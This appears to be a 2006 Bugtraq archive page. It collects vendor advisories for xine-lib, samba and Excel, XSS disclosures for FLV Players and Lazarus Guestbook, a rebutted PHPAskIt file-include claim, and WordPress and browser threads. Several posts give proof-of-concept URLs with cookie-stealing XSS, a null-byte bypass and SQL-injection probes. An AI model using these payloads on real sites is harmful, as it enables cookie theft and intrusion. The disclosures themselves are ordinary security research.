Re: # MHG Security Team --- PHPAskIt v2.0.1 Remote File Inc.

[amelie]

This vulnerability does not exist. Even with register_globals on, $dir and 
$qadir are overridden by a static variable within the script itself.

[ MDKSA-2006:121 ] - Updated xine-lib packages fix buffer overflow vulnerability

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:121
 http://www.mandriva.com/security/
 ___
 
 Package : xine-lib
 Date: July 12, 2006
 Affected: 2006.0, Corporate 3.0
 ___
 
 Problem Description:
 
 Stack-based buffer overflow in MiMMS 0.0.9 allows remote attackers to cause 
 a denial of service (application crash) and possibly execute arbitrary code 
 via the (1) send_command, (2) string_utf16, (3) get_data, and (4) 
 get_media_packet functions, and possibly other functions. Xine-lib contains
 an embedded copy of the same vulnerable code. 
 
 The updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2200
 ___
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 34c23d8a858d2a2687297e25618c7b04  
2006.0/RPMS/libxine1-1.1.0-9.6.20060mdk.i586.rpm
 57f9a069b8fc968a12ce24605390c1f1  
2006.0/RPMS/libxine1-devel-1.1.0-9.6.20060mdk.i586.rpm
 7c2652ce586d087793536649d7da6966  
2006.0/RPMS/xine-aa-1.1.0-9.6.20060mdk.i586.rpm
 37eff9bda8595acfbaf80e0998db1c9e  
2006.0/RPMS/xine-arts-1.1.0-9.6.20060mdk.i586.rpm
 e5672e6558978051f6878dea6ba961b5  
2006.0/RPMS/xine-dxr3-1.1.0-9.6.20060mdk.i586.rpm
 6527706516fb99a53f82d2c8c4b2e5f8  
2006.0/RPMS/xine-esd-1.1.0-9.6.20060mdk.i586.rpm
 10d172825fdd5dd2dd92dfafd5d60e23  
2006.0/RPMS/xine-flac-1.1.0-9.6.20060mdk.i586.rpm
 87b9a38b877b67f0ac0ee4f58ed50983  
2006.0/RPMS/xine-gnomevfs-1.1.0-9.6.20060mdk.i586.rpm
 8656ea92b3fca51e2fad861ea963b14d  
2006.0/RPMS/xine-image-1.1.0-9.6.20060mdk.i586.rpm
 6a538ee35d785dfc7ea64a03c20060da  
2006.0/RPMS/xine-plugins-1.1.0-9.6.20060mdk.i586.rpm
 9defa64950f2feebab9dda16d35523cb  
2006.0/RPMS/xine-polyp-1.1.0-9.6.20060mdk.i586.rpm
 d207307cb338b46edd703797b693ea24  
2006.0/RPMS/xine-smb-1.1.0-9.6.20060mdk.i586.rpm
 4dc1623162c6092eb10c755ed2c5366a  
2006.0/SRPMS/xine-lib-1.1.0-9.6.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 8798915891b79ac134565f8ede0653b1  
x86_64/2006.0/RPMS/lib64xine1-1.1.0-9.6.20060mdk.x86_64.rpm
 dcd2eb828f921b04206124835eeada8e  
x86_64/2006.0/RPMS/lib64xine1-devel-1.1.0-9.6.20060mdk.x86_64.rpm
 a933644c1c56d642a5d576cb217d0356  
x86_64/2006.0/RPMS/xine-aa-1.1.0-9.6.20060mdk.x86_64.rpm
 238d8526e618dff3aa31e223c14ce432  
x86_64/2006.0/RPMS/xine-arts-1.1.0-9.6.20060mdk.x86_64.rpm
 d9f0269ae701936ce27b6515e5c73ac1  
x86_64/2006.0/RPMS/xine-dxr3-1.1.0-9.6.20060mdk.x86_64.rpm
 4683507048ec6535c2c5f63997ec719d  
x86_64/2006.0/RPMS/xine-esd-1.1.0-9.6.20060mdk.x86_64.rpm
 bc649ad82f11c8422f1e9fb711dd4803  
x86_64/2006.0/RPMS/xine-flac-1.1.0-9.6.20060mdk.x86_64.rpm
 52fe1d4ddeeea6ec91a776ccacf5df19  
x86_64/2006.0/RPMS/xine-gnomevfs-1.1.0-9.6.20060mdk.x86_64.rpm
 348cc9ecf59e378b3d1c6aa12a35f9b9  
x86_64/2006.0/RPMS/xine-image-1.1.0-9.6.20060mdk.x86_64.rpm
 d2f2300e0bd4e4e210bbfae485c07624  
x86_64/2006.0/RPMS/xine-plugins-1.1.0-9.6.20060mdk.x86_64.rpm
 afca19bc708fc5964c19fff3a2d16286  
x86_64/2006.0/RPMS/xine-polyp-1.1.0-9.6.20060mdk.x86_64.rpm
 ba7c60488a4459066ba4ed08046ce48c  
x86_64/2006.0/RPMS/xine-smb-1.1.0-9.6.20060mdk.x86_64.rpm
 4dc1623162c6092eb10c755ed2c5366a  
x86_64/2006.0/SRPMS/xine-lib-1.1.0-9.6.20060mdk.src.rpm

 Corporate 3.0:
 1390c15ca893041af1076e6a02d14f47  
corporate/3.0/RPMS/libxine1-1-0.rc3.6.12.C30mdk.i586.rpm
 ecc53b859629edd48ef27b477332889e  
corporate/3.0/RPMS/libxine1-devel-1-0.rc3.6.12.C30mdk.i586.rpm
 a4d85795d05266793fa61ba6bc986aa6  
corporate/3.0/RPMS/xine-aa-1-0.rc3.6.12.C30mdk.i586.rpm
 4dd4249d6b1911501ddcfa1ef36470af  
corporate/3.0/RPMS/xine-arts-1-0.rc3.6.12.C30mdk.i586.rpm
 c9a3f82dad17f32a6ab6c0b1926c52c1  
corporate/3.0/RPMS/xine-dxr3-1-0.rc3.6.12.C30mdk.i586.rpm
 c40b65dd7cde826b8bfa5fb5720d15ed  
corporate/3.0/RPMS/xine-esd-1-0.rc3.6.12.C30mdk.i586.rpm
 2a257f092fe4b304be7e358230aa0361  
corporate/3.0/RPMS/xine-flac-1-0.rc3.6.12.C30mdk.i586.rpm
 b04b482c8693272f7ead71ac3ce91e7f  
corporate/3.0/RPMS/xine-gnomevfs-1-0.rc3.6.12.C30mdk.i586.rpm
 ae63549d198004056aacacee5b2ccbef  
corporate/3.0/RPMS/xine-plugins-1-0.rc3.6.12.C30mdk.i586.rpm
 d8fe8f9dff1190413e81e82e67762462  
corporate/3.0/SRPMS/xine-lib-1-0.rc3.6.12.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 aad2ac9345e05d900910b8beade5ff21  
x86_64/corporate/3.0/RPMS/lib64xine1-1-0.rc3.6.12.C30mdk.x86_64.rpm
 b9540819f0250a2924297ce0388f6202  
x86_64/corporate/3.0/RPMS/lib64xine1-devel-1-0.rc3.6.12.C30mdk.x86_64.rpm
 53cc9dc911be64bf8764d76262df4a44  
x86_64/corporate/3.0/RPMS/xine-aa-1-0.rc3.6.12.C30mdk.x86_64.rpm
 280b7a7ceb168225d30eb97e95f45fb6  
x86_64/corporate/3.0/RPMS/xine-arts-1-0.rc3.6.12.C30mdk.x86_64.rpm
 4e3811096df50e37e6b10f

FLV Players Multiple Input Validation Vulnerabilities

[xzerox]

Produce : FLV Players 8

Website : http://www.videospark.com


[+] Fullpath Disclosure :


1) http://localhost/flv8/paginate.php


Fatal error: Class simplepagemaker: Cannot inherit from undefined class object 
in /var/www/zero/httpdocs/flv8/paginate.php on line 45


2) http://localhost/flv8/player.php?p=somthing


atal error: SimplePageMaker::make() - out of bounds in page chihaja in 
/var/www/zero/httpdocs/flv8/paginate.php on line 131



[+] Multiple Cross Site Scripting 


PoC :


 http://localhost/flv8/player.php?url=[XSS]

 http://localhost/flv8/popup.php?url=%3C/title%3E[XSS]

 http://localhost/flv8/popup.php?url=%22%3E%3C[XSS]


Mourad 


Contact : [EMAIL PROTECTED]


Moroccan Security Research Team

NSFOCUS SA2006-05 : Microsoft Excel SELECTION Record Memory Corruption Vulnerability

[NSFOCUS Security Team]

NSFOCUS Security Advisory (SA2006-05)

Microsoft Excel SELECTION Record Memory Corruption Vulnerability 

Release Date: 2006-07-12

CVE ID: CVE-2006-1302

http://www.nsfocus.com/english/homepage/research/0605.htm

Affected systems & software
===
Microsoft Excel 2000
Microsoft Excel 2002
Microsoft Excel 2003

Unaffected systems & software
===


Summary
=

NSFocus Security Team discovered a memory corruption vulnerability in Microsoft 
Excel's processing of SELECTION record, which allows remote attackers to run 
arbitrary via carefully crafted Excel files. 

Description


Excel does not perform sufficient check for certain field when processing 
SELECTION record. During some data copying operation the user-supplied data 
might be used for the copying, resulting in memory corruption and arbitrary 
code execution. 

Attackers can craft an Excel file with malformed SELECTION record and allure 
users to open it via instant messaging tools, e-mail or other vectors, 
resulting 
in arbitrary code execution with the privilege of the user. If the user is 
the administrator, then attackers might take complete control over the system. 

Workaround
=

Do not open any Excel file from untrusted sources. 

Vendor Status
==

2006.03.30  Informed the vendor
2006.04.03  Vendor confirmed the vulnerability
2006.07.11  Microsoft has released a security bulletin (MS06-037) and related 
patches. 

For more details about the security bulletin, please refer to: 
http://www.microsoft.com/technet/security/bulletin/MS06-037.mspx

Additional Information


The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-1302 to this issue. This is a candidate for inclusion in the 
CVE list (http://cve.mitre.org), which standardizes names for security problems.
Candidates may change significantly before they become official CVE entries.

Acknowledgment
===

Wen Yujie of NSFocus Security Team found the vulnerability.

DISCLAIMS
==
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESSED OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2006 NSFOCUS. All Rights Reserved. Terms of use.


NSFOCUS Security Team <[EMAIL PROTECTED]>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA

Re: # MHG Security Team --- PHPAskIt v2.0.1 Remote File Inc.

[Amelie]

Hi there,

I would like to point out that the security vulnerability quoted below 
(and seen here: 
http://archives.neohapsis.com/archives/bugtraq/2006-06/0234.html - 
submitted to bugtraq on June 12, 2006) concerning the CodeGrrl.com 
script, PHPAskIt, is incorrect. I am the author of this script and can 
confidently say that no such hack can take place through the 
convertaa.php and convertwakqa.php files. This has been fully tested by 
myself and others when we became aware of the supposed vulnerability. 
The reason why a file inclusion cannot take place through the query 
string is because $qadir and $dir are defined within the script. Even 
with register_globals on, any instance of these variables declared as 
part of the query string (convertaa.php?qadir=[url to malicious script], 
for example) will be overwritten with the version in the script. The 
files work as such:


convertaa.php:

$qadir = "/home/user/public_html/somefolder/"; // Ask&Answer 
installation path (WITH trailing slash)


if (file_exists($qadir . "config.php")) { //checking for config.php in 
this folder and including it if it exists

   include($qadir . "config.php");
}
else { //if it doesn't exist
   die("Error: Ask&Answer's 
config.php could not be found. Please make 
sure this file exists in the directory you have specified and try 
again.");

}


//database conversion happens here

?>

convertwakqa.php:

$dir = "/home/user/public_html/somefolder/"; //replace with absolute 
path to your Wak's A&A directory (WITH SLASH AT THE END!)


if (file_exists($dir . "functions.php")) { //checking for a 
functions.php file in above directory and including it if it exists

   include($dir . "functions.php");
}
else {
   die("Error: Wak's Ask&Answer's 
functions.php could not be found. Please 
make sure this file exists in your Wak's Ask&Answer directory.");

}
if (file_exists("../config.php")) { //checking for config.php in parent 
folder and including if exists

   include("../config.php");
}
else {
   die("Error: Could not find PHPAskIt's 
config.php. Without this file, the script 
cannot operate. Please makes sure it exists.");

}


//database conversion

?>


As you can see, $dir and $qadir are defined and cannot be overwritten by 
additional variables in the GET array, or query string.


Furthermore, PHPAskIt 2.0+ will not run if any of the import files are 
left in place.


Please could you notify readers of any sites that may list this 
vulnerability that it is a hoax. CodeGrrl.com has recently come under 
fire for similar vulnerabilities in older scripts, and, being that 
PHPAskIt was released AFTER those were discovered, it was imperative 
that this sort of thing was avoided. Quite frankly I find it insulting 
that somebody has decided that I would be capable of leaving such a 
large security hole in my script when it was written a good three years 
after most of CodeGrrl.com's previous scripts, which contained a 
multiple file inclusion vulnerability in their password protection file, 
protection.php. I would never have left such an obvious hole in my own 
script.
It is our (CodeGrrl.com's) belief that people are spreading rumours 
about our newer scripts in an effort to further tarnish the site's 
reputation. However, PHPAskIt is NOT VULNERABLE TO REMOTE FILE INCLUSION.


Thank you for clearing this up on your site(s),

Amelie

CodeGrrl.com Staff


- Original Message 

#
# /\/\!|_|_! |-|4|23|<47 #
#

# Milli-Harekat Advisory ( www.milli-harekat.org )

# PHPAskIt <== v2.0.1 - Remote File Include Vulnerabilities

# Risk : High

# Class: Remote

# Script : PHPAskIt v2.0.1

# Credits : ERNE erne[at]ernealizm[dot]com

# Thanks : 
Dj_ReMix,The_bekir,SpC-x,Eskobar,LiZ0zim,EntRýk4,Korsan.Di_lejyoner and 
All MHG USERS


# Vulnerable :

http://www.site.com/[phpaskit_path]/import/convertaa.php?qadir=[evil_scripts] 



http://www.site.com/[phpaskit_path]/import/convertwakqa.php?dir=[evil_scripts] 

Re: WordPress 2.0.3 SQL Error and Full Path Disclosure

[zck zck]

Isn't this actually an SQL Injection rather than information leakage?

Try :
http://localhost/wordpress/index.php?paged=%27

I mean, the error message (this time in English) is:
WordPress database error: [You have an error in your SQL syntax; check
the manual that corresponds to your MySQL server version for the right
syntax to use near '-10, 10' at line 1]

It specifically says that "You have an error in your SQL syntax",
which means my input goes into the query...

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
Sent: Sunday, July 02, 2006 12:15
To: bugtraq@securityfocus.com
Subject: WordPress 2.0.3 SQL Error and Full Path Disclosure

WordPress 2.0.3 SQL Error and Full Path Disclosure
Discovered By zero [Moroccan Security Team]
Software: WordPress 2.0.3
Site : www.wordpress.org

~ SQL Error ~

Example:

http://localhost/wordpress/index.php?paged=-1

Result:

WordPress database error: [Erreur de syntaxe pr?s de '-20, 10' ? la
ligne 1]
SELECT DISTINCT * FROM wp_posts WHERE 1=1 AND post_date_gmt <=
'2006-06-29 12:46:59' AND (post_status = "publish") AND post_status !=
"attachment" GROUP BY wp_posts.ID ORDER BY post_date DESC LIMIT -20, 10


~ Full path ~

/wp-settings.php
/wp-admin/admin-footer.php
/wp-admin/admin-functions.php
/wp-admin/edit-form.php
/wp-admin/edit-form-advanced.php
/wp-admin/edit-form-comment.php
/wp-admin/edit-link-form.php
/wp-admin/edit-page-form.php
/wp-admin/menu.php
/wp-admin/menu-header.php
/wp-admin/upgrade-functions.php
/wp-admin/upgrade-schema.php
/wp-admin/import/blogger.php
/wp-admin/import/dotclear.php
/wp-admin/import/livejournal.php
/wp-admin/import/mt.php
/wp-admin/import/rss.php
/wp-admin/import/textpattern.php
/wp-content/plugins/hello.php
/wp-content/plugins/wp-db-backup.php
/wp-content/plugins/akismet/akismet.php
/wp-content/themes/classic/index.php
/wp-content/themes/classic/comments.php
/wp-content/themes/classic/comments- popup.php
/wp-content/themes/classic/footer.php
/wp-content/themes/classic/header.php
/wp-content/themes/classic/sidebar.php
/wp-content/themes/default/index.php
/wp-content/themes/default/404.php
/wp-content/themes/default/archive.php
/wp-content/themes/default/archives.php
/wp-content/themes/default/attachment.php
/wp-content/themes/default/comments-popup.php
/wp-content/themes/default/footer.php
/wp-content/themes/default/functions.php
/wp-content/themes/default/header.php
/wp-content/themes/default/links.php
/wp-content/themes/default/page.php
/wp-content/themes/default/search.php
/wp-content/themes/default/searchform.php
/wp-content/themes/default/sidebar.php
/wp-content/themes/default/single.php
/wp-includes/default-filters.php
/wp-includes/kses.php
/wp-includes/locale.php
/wp-includes/rss-functions.php
/wp-includes/template-loader.php
/wp-includes/vars.php
/wp-includes/wp-db.php


Greetz:

simo64, tahati, net_ghost, dabdoub, simo dreaminfo, iss4m, zerosecure,
hunter, themenotor ...

Contact:

Author: Mourad [ zero ]
Email : xzerox(at)linuxmail(dot)org

New CVE number states Excel Style handling as a separate issue

[Juha-Matti Laurio]

New CVE document
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3431

published recently confirms the information that Microsoft Excel Style handling 
vulnerability aka Nanika.xls issue is a separate vulnerability.
This vulnerability mentioned affects only to Simplified Chinese, Traditional 
Chinese, Japanese and Korean versions of Excel.

This vulnerability (let's say 4th Excel vulnerability) uses Repair Mode too and 
user interaction is needed.
This information has been updated to my First Microsoft Excel 0-day 
Vulnerability FAQ document at SecuriTeam Blogs.

If fix to this vulnerability is included to monthly July updates from Microsoft 
it's expected that this CVE-2006-3431
is listed in the upcoming security bulletin to clarify the situation.

So-called 1st Excel code execution vulnerability reported in June is
http://www.microsoft.com/technet/security/advisory/921365.mspx
and
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3059

- Juha-Matti

NSFOCUS SA2006-06 : Microsoft Excel COLINFO Record Buffer Overflow Vulnerability

[NSFOCUS Security Team]

NSFOCUS Security Advisory (SA2006-06)

Microsoft Excel COLINFO Record Buffer Overflow Vulnerability

Release Date: 2006-07-12

CVE ID: CVE-2006-1304

http://www.nsfocus.com/english/homepage/research/0606.htm

Affected systems & software
===
Microsoft Excel 2000
Microsoft Excel 2002
Microsoft Excel 2003

Unaffected systems & software
===


Summary
=

NSFocus Security Team discovered a buffer overflow vulnerability in Microsoft 
Excel's
processing of COLINFO record, which allows remote attackers to run arbitrary via
carefully crafted Excel files.

Description


Excel does not perform sufficient check for certain field when processing 
COLINFO record, which might cause a buffer overflow vulnerability in data 
filling
operation. Attackers can run arbitrary via carefully craft data.

Attackers can craft an Excel file with malformed COLINFO record and allure 
users to open it via instant messaging tools, e-mail or other vectors, 
resulting 
in arbitrary code execution with the privilege of the user. If the user is 
the administrator, then attackers might take complete control over the system. 

Workaround
=

Do not open any Excel file from untrusted sources. 

Vendor Status
==

2006.03.30  Informed the vendor
2006.04.03  Vendor confirmed the vulnerability
2006.07.11  Microsoft has released a security bulletin (MS06-037) and related 
patches. 

For more details about the security bulletin, please refer to: 
http://www.microsoft.com/technet/security/bulletin/MS06-037.mspx

Additional Information


The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-1304 to this issue. This is a candidate for inclusion in the 
CVE list (http://cve.mitre.org), which standardizes names for security problems.
Candidates may change significantly before they become official CVE entries.

Acknowledgment
===

Wen Yujie of NSFocus Security Team found the vulnerability.

DISCLAIMS
==
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESSED OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2006 NSFOCUS. All Rights Reserved. Terms of use.


NSFOCUS Security Team <[EMAIL PROTECTED]>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA

[ MDKSA-2006:120 ] - Updated samba packages fix DoS vulnerability

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:120
 http://www.mandriva.com/security/
 ___
 
 Package : samba
 Date: July 10, 2006
 Affected: 10.2, 2006.0, Corporate 3.0
 ___
 
 Problem Description:
 
 A vulnerability in samba 3.0.x was discovered where an attacker could
 cause a single smbd process to bloat, exhausting memory on the system.
 This bug is caused by continually increasing the size of an array which
 maintains state information about the number of active share
 connections.
 
 Updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3403
 http://www.samba.org/samba/security/CAN-2006-3403.html
 ___
 
 Updated Packages:
 
 Mandriva Linux 10.2:
 3eb4f4fe83862cc464bec94f345b1205  
10.2/RPMS/libsmbclient0-3.0.13-2.1.102mdk.i586.rpm
 20257c42dc31bfa2c7528e7033485aeb  
10.2/RPMS/libsmbclient0-devel-3.0.13-2.1.102mdk.i586.rpm
 4abbb93b864aec424b863085e4cd17fe  
10.2/RPMS/libsmbclient0-static-devel-3.0.13-2.1.102mdk.i586.rpm
 54c14b19aeda54fb096766938dcd7ba0  
10.2/RPMS/mount-cifs-3.0.13-2.1.102mdk.i586.rpm
 6a718136f97f343c1673e9e82aa6685c  10.2/RPMS/nss_wins-3.0.13-2.1.102mdk.i586.rpm
 e0f0ca5db168dbec2ee78c47b04d4dfe  
10.2/RPMS/samba-client-3.0.13-2.1.102mdk.i586.rpm
 aca4da8c53f090b9e41bd95690d95a27  
10.2/RPMS/samba-common-3.0.13-2.1.102mdk.i586.rpm
 80c6725741baa3386e8d15a552a2e5aa  
10.2/RPMS/samba-doc-3.0.13-2.1.102mdk.i586.rpm
 ef137687ddad3bee055d6d3870e74db8  
10.2/RPMS/samba-passdb-mysql-3.0.13-2.1.102mdk.i586.rpm
 226357f0e98fa1c3b8abe17a23d1f715  
10.2/RPMS/samba-passdb-pgsql-3.0.13-2.1.102mdk.i586.rpm
 80a8107ea3f020bc930ecde070aefb61  
10.2/RPMS/samba-passdb-xml-3.0.13-2.1.102mdk.i586.rpm
 e2d6e9fa08e770f08171d75dd1079d5a  
10.2/RPMS/samba-server-3.0.13-2.1.102mdk.i586.rpm
 62043615a61aa9424cee64634f6f8d95  
10.2/RPMS/samba-smbldap-tools-3.0.13-2.1.102mdk.i586.rpm
 b76512984b8268a6c1d6474dd623c405  
10.2/RPMS/samba-swat-3.0.13-2.1.102mdk.i586.rpm
 21f24f6b6d4ba6ebdaf259c9ad2ff894  
10.2/RPMS/samba-vscan-clamav-3.0.13-2.1.102mdk.i586.rpm
 268ecfc08e5cd02ec69b2c3df9a79e3c  
10.2/RPMS/samba-vscan-icap-3.0.13-2.1.102mdk.i586.rpm
 469c6f7ac18bb3f3e963b15d6ddb218b  
10.2/RPMS/samba-winbind-3.0.13-2.1.102mdk.i586.rpm
 3cfae3f4e389c05b161fc03447fe8ea1  10.2/SRPMS/samba-3.0.13-2.1.102mdk.src.rpm

 Mandriva Linux 10.2/X86_64:
 1cabdda84ee642347b89b39f9b20647f  
x86_64/10.2/RPMS/lib64smbclient0-3.0.13-2.1.102mdk.x86_64.rpm
 ac3ed439d87acb15e3c2e29c43a6c15c  
x86_64/10.2/RPMS/lib64smbclient0-devel-3.0.13-2.1.102mdk.x86_64.rpm
 62220c9ea9b521ae9255351f9d2e9a72  
x86_64/10.2/RPMS/lib64smbclient0-static-devel-3.0.13-2.1.102mdk.x86_64.rpm
 3eb4f4fe83862cc464bec94f345b1205  
x86_64/10.2/RPMS/libsmbclient0-3.0.13-2.1.102mdk.i586.rpm
 20257c42dc31bfa2c7528e7033485aeb  
x86_64/10.2/RPMS/libsmbclient0-devel-3.0.13-2.1.102mdk.i586.rpm
 4abbb93b864aec424b863085e4cd17fe  
x86_64/10.2/RPMS/libsmbclient0-static-devel-3.0.13-2.1.102mdk.i586.rpm
 e3ee798596a4c1a3986046100967082d  
x86_64/10.2/RPMS/mount-cifs-3.0.13-2.1.102mdk.x86_64.rpm
 f7cc4e909f28d48b265c11be4ea910d7  
x86_64/10.2/RPMS/nss_wins-3.0.13-2.1.102mdk.x86_64.rpm
 4740a0c21ac308c552611a5ee347c72a  
x86_64/10.2/RPMS/samba-client-3.0.13-2.1.102mdk.x86_64.rpm
 6115c746181eaeb5c0d1d507c116a6db  
x86_64/10.2/RPMS/samba-common-3.0.13-2.1.102mdk.x86_64.rpm
 ff054b178cff6c783fc730ca9c6ada5f  
x86_64/10.2/RPMS/samba-doc-3.0.13-2.1.102mdk.x86_64.rpm
 c6e65bf57165bdc7f438e92ec9bd7823  
x86_64/10.2/RPMS/samba-passdb-mysql-3.0.13-2.1.102mdk.x86_64.rpm
 abf978ba0e1a53d0bc7c9938787d57f5  
x86_64/10.2/RPMS/samba-passdb-pgsql-3.0.13-2.1.102mdk.x86_64.rpm
 8d3dcc5cfd15c7401bd0c1835b2ede77  
x86_64/10.2/RPMS/samba-passdb-xml-3.0.13-2.1.102mdk.x86_64.rpm
 47c818ab47d1a18e3fe2bdc44d7c3916  
x86_64/10.2/RPMS/samba-server-3.0.13-2.1.102mdk.x86_64.rpm
 0d64c5d745416788db5c1e879f04ae03  
x86_64/10.2/RPMS/samba-smbldap-tools-3.0.13-2.1.102mdk.x86_64.rpm
 fb96a98a1ec0fa08001e0ecb155bb243  
x86_64/10.2/RPMS/samba-swat-3.0.13-2.1.102mdk.x86_64.rpm
 06d7c44374d9ba8cde7077da3d6908c7  
x86_64/10.2/RPMS/samba-vscan-clamav-3.0.13-2.1.102mdk.x86_64.rpm
 d7349d986a8b2b602c2c74d405571c27  
x86_64/10.2/RPMS/samba-vscan-icap-3.0.13-2.1.102mdk.x86_64.rpm
 a7b8792e6ee53529f84dbb2c42431396  
x86_64/10.2/RPMS/samba-winbind-3.0.13-2.1.102mdk.x86_64.rpm
 3cfae3f4e389c05b161fc03447fe8ea1  
x86_64/10.2/SRPMS/samba-3.0.13-2.1.102mdk.src.rpm

 Mandriva Linux 2006.0:
 b639e531c8aa76a45bb4fd7fc0c9d08f  
2006.0/RPMS/libsmbclient0-3.0.20-3.1.20060mdk.i586.rpm
 21d7c1bcdae8ba923815557a265aed8c  
2006.0/RPMS/libsm

Lazarus Guestbook Cross Site Scripting Vulnerabilities

[simo64]

Produce : Lazarus Guestbook

Website : http://carbonize.co.uk/Lazarus/

Version : <= 1.6

Problem : Cross Site Scripting


1) 

The first probleme is in codes-english.php ,"show" parameter in 
lang/codes-english.php isn't properly sanitised

This can be exploited to execute arbitrary HTML and javascript code


 Vulnerable code in  lang/codes-english.php near line 4


1  

2  

3  

4   


Exploit : 


http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E[XSS]

http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3Ealert(document.cookie);



2)

the seconde probleme is in picture.php , the script verifiy fist if image file 
exists

after it display it ,


vulnerable code : in picture.php




24  if (!empty($_GET['img'])) {

26  if (file_exists("$GB_TMP/$_GET[img]")) {

27  $size = @GetImageSize("$GB_TMP/$_GET[img]");

28  $picture = "$GB_PG[base_url]/$GB_TMP/$_GET[img]";

29  }

..  

49  

50  \n";

53}

54?>

55





if magic_quote_gpc = OFF we can bypass this protection by specifing 
existing image file ( Exemple : "img/home.gif") and using a nullchar ( %00 )



POC : http://localhost/lazarusgb/picture.php?img=../img/home.gif%00[code]



file_exists("$GB_TMP/$_GET[img]") will return true and html code will be 
executed



Exploit: 



http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E[XSS]


http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3Ealert(document.cookie);



Contact : simo64[at]gmail[dot]com

Moroccan Security Research Team

RE: Old vulnerable sotwares collection

[John Rigali]

Older versions of various freely distributable programs can be found at
OldVersion.com (http://www.oldversion.com/).

--
John Rigali
Information Technology Coordinator
Verbum Dei High School
http://www.verbumdeihs.com/
Working in the Jesuit Tradition

-Original Message-
From: Jerome Athias [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 10, 2006 12:40 AM
To: bugtraq@securityfocus.com
Subject: Old vulnerable sotwares collection

Hi,

it's often difficult to find old versions of vulnerable softwares
it's usefull to have these old versions to test an exploit, study a 
vulnerability or doing a patch analysis...
it's also usefull to test a fuzzer, a scanner... for a course or a 
challenge...

so i think about to build a little reposiroty with old versions of 
little softwares (free or trial)

if interested or could help, please visit this page:
https://www.securinfos.info/old_softwares_vulnerable.php

Cheers
/JA

Re: Browser bugs hit IE, Firefox today (SANS)

[3CO]

On 7/4/06, Thor Larholm <[EMAIL PROTECTED]> wrote:

However, reading the contentDocument property of the DOM element instead
of the through the frames collection will give you a reference to the
document object inside the thirdparty domain and even allow you to
overwrite native DOM methods without throwing a security exception, such
as
document.getElementById("thirdparty").contentDocument.getElementById=function(s){alert(s)}.



This code throws an exception in Firefox 1.5.0.4:
"Error: uncaught exception: Permission denied to set property
HTMLDocument.getElementById
"

Just obtaining a reference to the contentDocument works, but any
action on it throws an error.

S21Sec-032-en: Vulnerability in Fatwire Content Server

[labs]

##

 - S21Sec Advisory -

##

Title:   FatWire Content Server
   ID:   S21SEC-032-en
 Severity:   High - Administrative Privileges Escalation
  History:   31.May.2006 Vulnerability discovered
 05.Jun.2006 Fixed (patch available)
Scope:   FatWire Content Server Portal
Platforms:   Any
   Author:   Alberto Moro ([EMAIL PROTECTED])
  URL:   http://www.s21sec.com/avisos/s21sec-032-en.txt
  Release:   Public

[ SUMMARY ]

The FatWire Content Server product suite enables companies to deploy a wide
variety and large quantity of Web sites and content-centric applications
that build customer loyalty, reach new markets, strengthen brand identity,
boost productivity, and reduce costs.


[ AFFECTED VERSIONS ]

Following tested versions are affected with this issue:

- FatWire Content Server 5.5.0 


[ DESCRIPTION ]

It's possible to obtain administrative privileges in the portal without
previous registration or validation.


[ WORKAROUND ]

Upgrade FatWire CS to the last version or apply the patch provided by
vendor.


[ ACKNOWLEDGMENTS ]

These vulnerabilities have been found and researched by:

- Alberto Moro <[EMAIL PROTECTED]> S21Sec

With thanks to:

